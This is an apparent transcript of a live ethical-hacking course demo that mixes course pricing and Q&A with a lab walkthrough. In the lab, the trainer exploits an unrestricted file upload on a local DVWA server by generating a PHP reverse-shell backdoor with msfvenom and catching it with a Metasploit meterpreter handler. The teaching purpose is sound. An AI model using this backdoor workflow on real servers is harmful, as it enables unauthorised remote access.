If you want to get into the racing, like this car racing or bike racing, first you should know normal driving, right? The same thing here.
Okay.
Cloud security is a specialization. If you want to get into that, first finish CH, then get into the cloud security.
Okay. Thanks.
Yeah, fine, Chandan. next week, guys, we'll try to cover some mobile hacking, and I'll show you some examples for SAST also. What exactly we do as part of SAST, what exactly we do as part of mobile. Then monitoring tool, SIEM. SIEM is like from a different trainer again. His name is again Narendra. He has 8+ years of experience only in the SOC. Here, the trainer is different. I am not the trainer for SIEM. I am not the trainer for weekend batch. But I try to cover mobile security, then source code analysis, DevSecOps, cloud, and normal job-oriented program. I'll give you a reminder. Try to guys log into the same time the next week. Shall we get into the labs? Last 2 questions. I'll show you some basic labs. Last 2 questions. Who wants to?
Sorry, 1 minute if you don't.
Yes, of course.
Actually, I mean, end of the course, do we have any projects or real-time projects like for anything planning, any plans you have like real-time projects, some kind of stuff?
Real-time projects. Actually, we have our sample servers and websites and some open source. Got it? You want to do hacking, right? You need a mobile. You want to do hacking, you need a website, you need a network.
Yeah.
So all these things, we have some of the servers, we have hosted it within our data centers, and some open source also there. Ultimately, like you are going to get trained on 5 to 10 targets as part of our job oriented program. Then when you get into the job, additionally, whatever is the application they are trying to learn, they are trying to give you. Say, for example, you got placed in HSBC. HSBC has websites. Earlier, you are working for HackerBook and you are testing HackerBook website in real time. And you did a job domain change and you got placed with HSBC Bank. They'll give their website. Same thing you have to do. That's it. Same kind of labs, same kind of tools, same kind of process. In fact, when you are getting trained from us, we are going to train you on different domains. If you see here, almost 7 to 8 specializations, concepts I would have covered. We try to cover concepts based on the assuming like you have to clear the interviews, okay, and you need to work in the real time. But when you get into the job, you'll not be working in all these areas. You'll be working only for API pen testing, or you'll be working only for mobile, only for DevSecOps, or combination of this. As per my knowledge, 1 or 2 combinations people are working once they get the job. Some people will be working only on web also. Within web also, like without any tools, I mean to say without any manual intervention, tools itself will take care of the work. Your job is just to work on the tools. Like that, we'll discuss that when I use one of the demo, right? You'll get some idea on that. Last question. We started at 10:30, now it is 11:45. We'll try to finish in another 20 minutes, guys.
Hi, sir.
Yes, Jay Krishna.
Sir, I joined it from regarding the SOC only, but when the demo SOC?
Demo will be next week. That is actually it is supposed to be today, but due to some reasons it got postponed to 6th. And the training will start from after the demo, either 9th or 10th. 6th is the demo. Sorry. Hold on. 29 is Saturday. Today, right?
Yes, right.
6th demo next Saturday. Then Tuesday or Wednesday we'll start the classes on SOC. You guys can join for that batch. Actually, the pricing for SOC is yes. As of now, I remember 28 plus GST. But keep in touch with our admin. He will give you if there are any discounts on that. Here, the advantage is training plus certification from EC Council. Nowadays, right, only training itself will cost you from 15 to 20K. Just additionally 8K, you are getting a certification from one of the certification board. That is an advantage. So,
sir, I am a fresher. Can I take this certificate or no need, sir? SOC certificate.
Now you are taking training again. If you want to go for certification after 6 months, only for certification also again you need to pay 28K.
Because my question is, fresher also needed this certificate or?
Yes, of course. For freshers, still it will be good advantage. We'll give you 6 months of internship. when you take any of these training programs. When you one advantage for all of you is, if you get enrolled for any of our training programs, some of the courses we give it at free of cost. Say for example, you enrolled for cyber security, completely this manual testing, then IAM, some other courses are there under manual testing program. Those are free of cost. We'll be publishing the dates. You guys can attend those sessions if you want to gain more knowledge as well. Yeah.
Thank you, sir.
Okay, fine. Are you guys done or any other doubts, questions? Feel free to ask any of the questions. You can ask any of the questions. I don't mind. Is the training good? Do you get jobs? Is the job guarantee program? Anything, whatever you have any doubts in your mind, feel free to ask me. No issues.
Online, offline.
Where is that?
Hello.
Yes.
Sir, online, offline.
Jaya, can you be a bit louder? Yeah.
SOC, online, offline.
Yes, yes. CH batch from Tuesday it is going to be morning batch, online batch. Okay. And weekend batch is in the June 1st week. That will be offline batch, Bangalore, Marthalli branch. Marthalli area, our office is there. There the offline training will be there. Ravi is going to conduct. Yes, BVR, you can record the session. I am recording this session. I'll post it in the YouTube. You guys can take it, no issues. If you want to record personally, also no issues. You can do that.
Sir, SOC. Yes, sir.
Anupama, 5 years of experience with no knowledge in cybersecurity. What is the combination you are going to suggest us? CH, I will suggest. Then cloud security. Not together, one after another. You take real-time job-oriented training plus CH, get into the work. Along with the work, you take the cloud. That is my suggestion. SOC is online or offline? SOC is online. But if you have any questions, for all these training programs and certifications, you guys, whatever the questions you have, you can reach out to our support between 11 and 5 p.m. We'll try to help you on the labs on daily basis. You can get into our office, get your doubts clarified, whether you are in work or outside of the work, whatever it is. What is the difference between CH, SOC and cloud? We discussed about CH. CH is on the offensive side, means completely hacking course. SOC is on the defensive side. So someone is hacking, you want to see from your organization who is hacking your servers. Then SOC comes into the picture. What about cloud? Cloud is both offensive and defensive, but it is one kind of a new technology where your hosting is different. Hosting means, say, I have a website. All these days, I have database server plus web server plus app server. All these servers I kept in my office 4th floor. This is called on-premises. Means for my website, all the servers are located in my Bangalore center. But whereas when it comes to the cloud, recently we migrated. Now Azure has the data center. It is in US. They will provide me this infrastructure, database server, web server, app server. It is there in the Azure servers, and I can access my website from the internet. This is the concept of cloud. We want to protect the applications that are hosted over the cloud. That is a cloud security means. I have 1 year of experience in manual testing with zero knowledge on cybersecurity. Which combination you suggest? That's what 0 to 3 years of experience. You guys start with job oriented plus CH. Job oriented training plus CH. If you are doing a domain change from 0 to 3 years of experience, if you are having more than 3 years or 4 years of experience in some other domain, then we would go for job plus CH. After that, put your profile for job, then parallelly learn cloud. More than 3 years of experience. Okay, one question, when is the course fee for CH? As of now, job oriented program 20K we are charging and CH 36K. GST is applicable, but maybe like they can negotiate it. GST is applicable, which will be additional 5,000 or 10,000. You can discuss with this number, admin number. He'll provide you some discounts. Okay. I remember for job oriented training, there is a discount of 4K, it will come to 16K. This one, they can eliminate GST and give you 36K without GST. Means GST is there, but instead of 36K, you may get it for 30K plus GST, which will come to 36. I'm not sure. I'm just giving you some 1 month back how these are being priced.
Is it including certification cost or like only course fee?
If you are taking only CH training, you'll be charged only 36K. Okay. Job oriented training means like we guide you for the profile, resume preparation, interview questions, answers, and some more additional concepts. That together, so 36K you can consider only for certification. If there is any discount, they'll get it. Okay. If you're looking for the job, then you need to get into the job oriented plus CH. This year it will cost you 16K.
So you mean to say like under 52K, we can complete job oriented CH plus certification?
Yes. Together, if you are taking, there are some discounts. Maybe like you may get it for 50K, I guess.
Okay.
Yeah. Completely like you are not into IT or you are not into cyber security, you want to get into IT. Technically, you may with certification job oriented program, pay 50K. Will help you for resume, profile creation, interview preparation, and then like we'll guide you to get into the job in a very safe manner without any difficulty.
Okay, I'll call to the admin, like to get more information on that.
Sure.
Thank you.
Okay, guys. We have got under 10 minutes. We are running out of time. We'll do one small lab. Let us see what do we do as part of vulnerability assessment and pen testing. These two are different. Don't get confused. VA is different. Pen testing is different. Targets are same. What do you mean by target? Target means something which you want to hack. VA is there. Pen testing is there. You can do it for web. You can do it for network, or you can do it for any other target, right? Vulnerability means it is a defect. Security defect, we call it as vulnerability. Security defect or security loopholes. As a security engineer, your work as a security engineer is to find these security defects, security loopholes called vulnerabilities. Vulnerabilities are good for the application or bad? What is your answer? Everyone, reply in the chat window. Yeah. Vulnerabilities are bad for the application. Okay. If you are able to hack, it means that we are able to hack because of the vulnerabilities. Whether you are a web security engineer, network security engineer, mobile hacker, or IoT, whatever it is, their job is same. Their job is to find vulnerabilities and fix it. That's it. That's how you are paid. Okay. So finding a loophole is called vulnerability. vulnerability assessment is more of like finding vulnerabilities with the help of tools and manual process. Then what is meant by pen testing? In pen testing, these vulnerabilities we collect and then we try to hack. Hack in the sense, gain access. That's it, right? Unless there are vulnerabilities, you cannot hack it. So once you find vulnerabilities, we try to gain access. This process of gaining access is called exploitation. Exploit means the process of gaining access with the help of the vulnerabilities is called exploitation, and the testing you perform for gaining access is called penetration testing. So for pen testing, we have CPENT, CH practical, these two training programs. For vulnerability assessment, we have CH. Even exploitation is also covered as part of CH, but not in detail, because if you want to pass CH practical or CPENT, these are all practical labs. You need to pass that exam. Whereas CH, it is multiple choice questions. Let us do both vulnerability assessment and pen testing, considering one small example. If you have already attended my demos or my classes for CH, don't answer the questions. Let the new people answer it. Okay. We'll do one small lab. I'll make you to find some vulnerabilities now. Okay. Yeah, let's get started. I'm going to use one operating system called Kali Linux. Okay. Kali Linux is a Debian-based Linux operating system that is used for hacking. We can hack web applications, we can have mobile applications, whatever it is. But the main purpose of this operating system is all the hacking tools will be pre-installed in this server. Okay. Everyone knows about Facebook application, Gmail application, or is there? I don't think anyone is here who has not uploaded any images to the Facebook or WhatsApp. Is there anyone like that? Everyone knows how to upload the files, right? Most of the applications, you would have uploaded any kind of videos or images. Considering that, I'll show you one sample page in one application where you can upload some images. For example, there is such similar functionality is there. There is a browse option. You can select some image and upload that image. This is a normal use case, customer case, how the customers can upload the images, right? Click on browse. I want to select some image. Am I correct? Let me see one image here. Desktop. One Spider-Man image is there. I've selected that. Click on upload. Didn't upload, maybe the image clarity or size restrictions are there. Let me select a different image. Try image. Try is a movie name. Oh, this one also didn't upload. Any another image? Try to. Okay. We have successfully uploaded this image. I want everyone to respond with one application where you have uploaded such images. Leave about Facebook. Facebook I covered. So in Facebook, I have uploaded some images. I have uploaded some videos like that. Give me one application where you have experienced this functionality. Who wants to answer this? Everyone try to answer in the chat window. Give me the application name. Orkut, yes, of course. Images and it can be any document. I'm referring the file upload functionality. Instagram, yes, you upload images, videos. WhatsApp, yes, images, videos, documents. Twitter, any kind of documents, images again. Gmail, Word documents, Excel sheet, anything you can upload using Gmail. Google Drive, same thing. Any other applications? So far, you guys have covered social networking websites. How about other websites? Try to concentrate to different domain, not only on the social networking. Give me one government website where you upload some files. Okay, you want to apply for some exam. You try to upload your 10th marks card. Other is there, PF account, EPF. Other, you want to upload some documents to update your phone number. One of the example. How about insurance companies? You want to upload your policy details to claim. How about e-commerce applications, banking applications, ticket booking apps, matrimonial sites, college websites, healthcare applications, news channels. Like that, so many domains are there where you can find the functionality of uploading the files, right? As a normal user, assume like so many of you are using Facebook, so many of you are using WhatsApp. Everyone would have tried this functionality. As a normal user, always you do like, okay, we need to upload files, we have to upload. Let us do that. Click on browse. You want to upload this file, try to your friend so that he can see it from his system. Upload, click on upload, upload it. That's it, done. That's what you do. But as a hacker, when you look at this functionality, you need to find vulnerabilities. Vulnerabilities means some loopholes you have to find so that it will be useful for you to hack the system. The system or the server here is just like Facebook or Google or Instagram. There is one server, 154.130 is the IP address. Now tell me, what are the different kinds of vulnerabilities you see in this functionality? First, find vulnerabilities, then we hack the system. Do you guys see any vulnerabilities in this functionality? I'll try to list what are the vulnerabilities you tell me now. How do you find vulnerabilities? Give me some scenarios, or based on your understanding, you can tell me like, okay, this should not be like this. What scenarios do you try? Think like you are testing a car. It can be driven with fuel like a diesel. If you want to make that not working, or if you want to make that as not usable, what do? You can change the fuel. Instead of diesel, put water, or put petrol, or add some salt or sugar into the diesel and fill that. That's how you can destroy some vehicle. Same thing, there is a server here. Disconnect fuel pump. So many things are there. There is a server. They have given me the functionality of file uploads. I am a hacker. Some or other way I want to either bring down this server or hack this server. Now tell me, for this application, how can we do it? Sanjana, show me some mobile APK application. We'll do it tomorrow, not tomorrow, next week, Sanjana. We do have that. I was trying that in the yesterday, but because of time constraints, we'll do it. I have prepared working on that. There was some issue with the signing. That's the reason I cannot show it now. We'll do this today. Next week, definitely we'll cover the mobile APK. APK signing was done, but some or other way the download error is coming. Everything is done. We'll show this one along with the 2 or 3 labs. Next week we'll show this mobile hacking. That's it. Last 1 minute. Who wants to answer? I want you to find some vulnerabilities. Okay. Should I give you some hint? Compare this functionality with Facebook file upload. In Facebook also you are uploading some image, right? Here also you are uploading some image. I selected an image. Then open, upload. This is the functionality. You compare with Facebook and see, do you find any differences between Facebook file upload and then my application, DVW application file upload, and WhatsApp file upload. Last 30 seconds. As a hacker, you need to see one level deeper. Most of you are going to get enrolled for the training, at least 50%. You should always concentrate on something, right? How the detectives will be there, investigation officers, cybercrime investigation officers, police, everything they try to do one level deeper, right? I got correct answer. One of the correct answers. Who is that? Sheikh Lalu. Okay, any other issues? Did you observe this path? I'm trying to upload an image. But is it necessary to show this path? Where exactly they're storing? Does Facebook show you the path in the path of their servers? Where exactly they're storing these files? I uploaded only one image. I am one of the user. Just like Facebook, even this application has hundreds of users. If they show path like this, copy that path. Can I see what is there in the upload folders? Is it possible? Yes or no? Is it possible for me to see what are the different other files that are there in the uploads? How can we see that? What is the answer? URL is there, it is showing the path. Identify the root path, paste it over the browser and enter. That's it. Ideally, as one of the Facebook user, you are supposed to see only your images. If you are able to see images of all the entire Facebook database, their videos, personal images, is this vulnerability or not? This is called one of the vulnerability. Out of 30 or 40 vulnerabilities, you guys have learned first vulnerability as a cyber security engineer. So the first issue is file paths are shown. There are a few more vulnerabilities are there. Second vulnerability is, why should I upload only image? Can I upload some virus? Can I upload some .exe file? Can I upload .html file? Yes, I can do that. .html file or .php file. Can we try that? Yes, of course. Let me see if it accepts the malicious scripts. Go to the upload, browse. I have one sample HTML file. I'll consider it for now instead of again creating it. Okay. Upload.html. Okay. Program1.html. Upload. HTML files also it is accepting. HTML file also it is accepting. So HTML files contain some kind of HTML scripts. I don't know what is there in this script. Can we execute that script? Yes, looks like there is a JavaScript, it is getting executed. So the second vulnerability is scripts are getting executed. If it is accepting some scripts, basic scripts like showing some image or showing some message, this whatever I tried is showing a message. This is a script which got executed. Can I upload a script to get access to the server? Is it possible? It is accepting the scripts which can be executed to show a message. So we can try even uploading a script which can execute and then gain access to the server. This is also possible, right? We'll try that. So whatever we have done so far is called vulnerability assessment. We have to find these vulnerabilities. By using these vulnerabilities, you need to gain access. So from here onwards, it is called pen testing. Without vulnerability, you cannot do the pen testing. Okay, first find vulnerabilities, then we'll get into pen testing. For doing pen testing, we depend on some tools. For now, don't get scared. Don't worry about these tools. If you are part of our regular course, you are going to learn all these tools. Okay. Just like command prompt in Windows, we have a terminal in Linux. Launch this terminal. I'm going to prepare one PHP file which can be used for gaining the session. For that, I use a tool called MSF Pinum. And there are some set of parameters we need to set. L host is listening host. Listening means attacker is listening. And IP address of the attacker. L port 5599 hyphen format is raw. I want to save this in Kali folder as demo underscore backdoor.php. We know that application is vulnerable. It is accepting all the file types. I'm utilizing that functionality to upload one backdoor file. Backdoor in the sense, it has to give me the connections to the server from attacker system, right? Enter. Let this file get created. Then later we'll upload this file and try to gain the session. Does anyone know what is the command for finding the IP address in Linux operating system? How to find the IP address? What is the command? If config. Okay. What is the IP address of my system? It should be 154.128. Yes, this is correct. 192.168.154.128. I created the file called demo.backdoor. Am I correct? Is it created first? Demo underscore backdoor.php got created. Now I have to upload this file and then execute it. Before that, you need to run some exploitation job. For that, I use a tool called MSF console. Don't worry about these comments. We'll discuss it in the actual course. Okay. Very simple tool. You just need to remember 10 or 10 commands. That's it for Metasploit framework. By using this tool, I'm going to hack that. Use multi/handler. This is one of the exploitation module. At present, it has taken by default generic shell reverse TCP, but we will take the meterpreter. Set space payload space php/meterpreter /reverse underscore TCP. So I'm trying to set a payload. Okay, let me correct the spelling. Set space payload space php/meterpreter/reverse TCP. If you're going to hack Android application, payload will be like Android/meterpreter/reverse TCP. If you're going to hack Windows operating system, the payload will be like Windows/meterpreter/reverse TCP. Very simple, very easy tool, not at all difficulty. Only thing is you need to learn about concepts and cybersecurity terminology. We have set that payload. We need to set the options. Show space options. L host you need to put, L port you need to put. Set space, L host space. Listening host is the attacker IP address, that is 192.168.154.128. Set space, L port space, port number. What is the port number? We have configured that PHP file. I forgot 55. Let me open that file and see. Whatever is the port number you have configured in the backdoor file, same port number you should listen. If you are listening in a different port, you will not get the session. Right? File, open, and go to the Kali folder. Where am I now? Okay. Kali. Demo underscore backdoor.php, you open it. Yeah. This is the port number which we have used, and listening IP, listening port number 5599. Set L port as 5599. Enter. Check whether these options got reflected by using show space options. Yes. Now try to exploit it. It will run a job like you are waiting at one door, but one of your house is there, and one door, you are waiting, someone can enter into your door. You're just listening. Like that, this meter reverse TCP will be listening through some port. If someone opens that backdoor file, I'll gain access to their system. Only thing is, that's remote server or remote target should understand the PHP language. The server is based on the PHP, so definitely it will understand the PHP file. Browse. Go to the Kali. Where is the backdoor.php? Demo.backdoor, right? Demo underscore backdoor.php. Upload. Done. So we have uploaded an image, and then the exploitation job is running. Did we get the session or not? It is just running, still we didn't get the session. What is the problem? Who wants to answer this? The job is running, file is uploaded, still I didn't get the access to the server. What should we do? Any answers? You have downloaded one gaming software in your mobile from Play Store. After downloading, if you want to play that, you need to install it. Yes. Okay. Same thing here. Of course, job is running, file also got uploaded, but did we execute this file? No. If you execute only, then you'll get the session. Paste it, enter. Now go back to the system. You can see here there is some session got opened from 128. 128 is Kali Linux attacker IP address. Port number is 5599. We get access to the 130, that is the server. 130 is the server. And then random port number it opened for communication is 41609. How do you confirm that you are in the server? Type sysinfo. It is giving the name of the server, not the attacker IP address. Right? LS, list of files, present working directory, shell session. So now you type ifconfig. Usually ifconfig should list my own IP address, that is 128. IP space A. But it is listing me 130 server IP address. So did I got the session or not? Did I get the session or not? Gaining the session hacking is like, this is like we have hacked the Linux server by using file upload functionality. Okay. The exploitation part is different. Finding vulnerabilities is different. But when it comes to the job, we have found vulnerability and then exploitation. 90% of the jobs on cybersecurity are on VA. Pen testing is there, but pen testing is not guaranteed that we'll gain the access in the real time. Okay. Most of your jobs on VA. Pen testing, CH practical, CPent. But as part of our CH course, we do both VA PT we are going to learn. Okay. This is one of the example. When next week 10:30 a.m. on the same time Saturday, we are going to cover for mobile, then system along with SOC demo. Same timings, maybe 1.5 hours is enough. 10:30 to 11:30, 12:30. Okay, that's a plan for the next week. And some cloud demo if time permits. I'll give you some overview on the cloud. We have got another 7 minutes. Do you guys have any questions? Can you show the paint file? Okay, this one. Any other questions? I see one question from someone. Alekhya. Okay. To answer your question, Alekhya, you have got 5 years of experience, and can I take ECDE directly or should I take CH? Start with CH because CH is the most demanded certification across the globe. It is not just in India. Okay, start with CH, then you take ECDE. If you are taking multiple certifications, there are some discounts. Okay, fine. Any other questions, guys? We have got another 6 minutes. Yeah, it is really a good session, 2 hours of time. Thanks everyone. I am waiting. If you guys have any other questions, you guys can ask me. Okay, let me give you permissions. You can unmute and ask me, or you can message. The next batch is going to start from 2nd onwards. That is Tuesday onwards. So interested can get enrolled for this training. There are some discounts if you are getting enrolled before the start date. You get it for 16K. After that, it is 20K for real-time job-oriented training. And whereas 38K plus GST is there, 36K plus GST for certification, which will come to 42K. But if you are getting enrolled together, ideally it will cost you 62K together. But if you are getting enrolling together, you may get it for 50K also. Just check with admin. Okay. CH course, what is the price? Yeah, that's now I discussed. This is for job-oriented training. And for CH, the 36K plus GST. Together, ideal price, it will come to 20 plus 42, 62K. If you are taking together at a time, you'll get it for 50K. This I am sure. Mobile hacking is covered. One question from Chandan. Is mobile hacking covered in cybersecurity CH? Yes. Ideally, this is not part of CH or not part of mobile hacking. We give training because of the job purpose. You get more jobs because you have been trained on the mobile hacking. We do cover as part of this course. Upcoming batch is online morning batch. Morning 7:30 a.m. it starts. Remember, the offer is applicable only till 2nd. Job-oriented program, we are priced at 20K. If you are getting enrolled before 2nd, you get it for 16. From 2nd onwards, it will be 20K. Certification, again, like this discount will be there, but sometimes the council, EC council itself will increase the price. So better you guys can plan it together if you are serious about your cybersecurity career. This is the same thing wherever you go. And yes, we provide you all the recorded videos like this. Say, for example, January paid batch is there. We'll give you access to this each and every class, like class 1, class 2, all these things. You can download to your mobile or laptop and then refer all these hacking labs. Some videos which are very rare to get outside, that I'll upload it only in YouTube. Okay. Yeah. One challenge for us is I give access to one person, then you guys give access to some other people. That's the reason what we do is some proprietary videos, very rare videos, I try to upload in YouTube so that only our people get access to those. Okay, guys, thank you so much. Have a great weekend. And then if you guys have any questions, queries, do keep in touch with Anvesh. The number is 854-999-5000. And if he's not able to answer, message me. You guys can message me, but depending on my free time, I'll try to reply to you. This is my number, 9108047645.
Hari,
Yes.
one last question.
Yes, tell me.
Actually, if I join for CH course, can we refer? I mean, after the class, and can I get the videos to refer? I mean, we don't want to download. You know how you people are not giving the download permission, but I know the constraints. But the thing is, for referring purpose, can we get those videos to religion or again and again? How is there any sense like that?
Job-oriented training, we give the CH videos. You can download and keep it forever, because we will be doing some labs. In case if you forget like how to do
suppose
it.
If I go for, suppose if I go for CH course only 36,000 course only, like for that.
For that also we provide these videos. Only difference is, for example, DevSecOps, some special sessions like interview questions and interview questions walkthrough, then resume, profile creation, job monitoring. These things we don't do it as part of CH. CH technically you are going to learn all the hacking concepts. Additionally, some job oriented sessions,
Yeah,
profile, those things you don't get. You get videos
but
for
now I don't have.
you.
Yeah, that is what I am. For now,
Yes, yes.
I'm not offered that. Job training. So for I am going for that
If you are
course
not
on the
looking for a
CH
job, you
course.
can go only for CH certification. You do get
Yeah,
videos.
I need that.
Sure, sure. We'll do
But
that.
for re-listening, I need those. Yes.
Yeah, definitely. Ram.
Okay, thank you.
That's it. Okay, guys. Thank you so much. See you next week again. Bye bye. We'll make it more interesting next week. Only labs, no theory. Okay.